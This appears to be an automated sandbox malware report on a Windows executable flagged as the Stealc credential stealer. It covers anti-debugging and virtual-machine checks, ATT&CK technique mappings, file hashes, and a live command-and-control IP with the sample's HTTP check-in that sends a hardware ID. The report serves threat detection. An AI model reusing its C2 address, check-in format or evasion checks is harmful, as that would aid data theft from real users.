                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FFE second address: D48005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B91A10 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D39BB3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DC8C97 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00944910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0093DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0093E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0093ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00944570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0093F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00943EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00943EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0093DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0093BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00931160 GetSystemInfo,ExitProcess,0_2_00931160
                Source: file.exe, file.exe, 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1791344815.0000000001615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware]z
                Source: file.exe, 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1791344815.00000000015DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13652
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13655
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13674
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13666
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13706
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009345C0 VirtualProtect ?,00000004,00000100,000000000_2_009345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00949860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949750 mov eax, dword ptr fs:[00000030h]0_2_00949750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009478E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00949600
                Source: file.exe, file.exe, 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: fProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00947B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00947980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00947980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00947850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00947850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00947A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00947A30

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.930000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.930000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem324
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/ofile.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmptrue
                  unknown
                  http://185.215.113.37/e2b1563c6670f193.phpBfile.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmptrue
                    unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    http://185.215.113.37/e2b1563c6670f193.phppfile.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmptrue
                      unknown
                      http://185.215.113.37/(file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://185.215.113.37/wsfile.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        unknown
                        http://185.215.113.37/e2b1563c6670f193.phpCfile.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmptrue
                          unknown
                          http://185.215.113.37n0Bfile.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            http://185.215.113.37/e2b1563c6670f193.php7file.exe, 00000000.00000002.1791344815.00000000015DF000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              unknownPortugal
                              206894WHOLESALECONNECTIONSNLtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1540589
                              Start date and time:2024-10-23 23:52:04 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 18s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:1
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 82
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.94700104517017
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'875'968 bytes
                              MD5:7abee0417c0e20b647a09a23767c082f
                              SHA1:15fb1c418c08318532b0468e4e1fc39935647abb
                              SHA256:b6a02f7945ee3ffe763c9a12d10ad6d03c327e625b8b31fd9cfb615ed633f3dd
                              SHA512:76c08c1f88aaea3f6f5f43283d04c25edaa440ab80a70c800c4689045e75a96d7d12361614bb511710497cd0132a639e0d92ef4f88c11988f5c91540b6a9448b
                              SSDEEP:49152:cZXb3p4sokSuMvZjAU8kxY2fNdt+UWkRgU3BF7bV:ATp4soiMBjqkxpd0iRxfb
                              TLSH:EC9533E1482213DFD0418BB40E2CDE41167018717794EB68626F6F34DAB6E946DEB8FD
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                              Icon Hash:90cececece8e8eb0
                              Entrypoint:0xaa9000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007FDA24F4FF2Ah
                              movd dword ptr [eax+eax], mm3
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007FDA24F51F25h
                              add bh, bh
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x228000d879e86377193ed55bafadf761accc7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2a60000x2006c103240736358f30d8927e5c5fc6d55unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              saegsldb0x5040000x1a40000x1a3e001eeb02f85286e3015f63baf5e5cab05bFalse0.9947668576957428data7.953512758642051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              mkoehnsu0x6a80000x10000x40010eb151582cfc80c1c9de480dea91ae7False0.7646484375data5.969175656960636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6a90000x30000x2200f46b9853e4fad235927c2ee4d1cdc75fFalse0.0627297794117647DOS executable (COM)0.8288937216243366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              DLLImport
                              kernel32.dlllstrcpy
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-23T23:53:06.726996+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 23, 2024 23:53:05.521007061 CEST4973080192.168.2.4185.215.113.37
                              Oct 23, 2024 23:53:05.526515007 CEST8049730185.215.113.37192.168.2.4
                              Oct 23, 2024 23:53:05.526606083 CEST4973080192.168.2.4185.215.113.37
                              Oct 23, 2024 23:53:05.526770115 CEST4973080192.168.2.4185.215.113.37
                              Oct 23, 2024 23:53:05.532196999 CEST8049730185.215.113.37192.168.2.4
                              Oct 23, 2024 23:53:06.438635111 CEST8049730185.215.113.37192.168.2.4
                              Oct 23, 2024 23:53:06.438720942 CEST4973080192.168.2.4185.215.113.37
                              Oct 23, 2024 23:53:06.441001892 CEST4973080192.168.2.4185.215.113.37
                              Oct 23, 2024 23:53:06.446829081 CEST8049730185.215.113.37192.168.2.4
                              Oct 23, 2024 23:53:06.726798058 CEST8049730185.215.113.37192.168.2.4
                              Oct 23, 2024 23:53:06.726995945 CEST4973080192.168.2.4185.215.113.37
                              Oct 23, 2024 23:53:10.006337881 CEST4973080192.168.2.4185.215.113.37
                              • 185.215.113.37
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730185.215.113.37803228C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 23, 2024 23:53:05.526770115 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 23, 2024 23:53:06.438635111 CEST203INHTTP/1.1 200 OK
                              Date: Wed, 23 Oct 2024 21:53:06 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 23, 2024 23:53:06.441001892 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJD
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 33 35 31 36 33 42 31 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a
                              Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="hwid"6335163B10381806970752------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="build"doma------CFHIIEHJKKECGCBFIIJD--
                              Oct 23, 2024 23:53:06.726798058 CEST210INHTTP/1.1 200 OK
                              Date: Wed, 23 Oct 2024 21:53:06 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Target ID:0
                              Start time:17:53:01
                              Start date:23/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x930000
                              File size:1'875'968 bytes
                              MD5 hash:7ABEE0417C0E20B647A09A23767C082F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
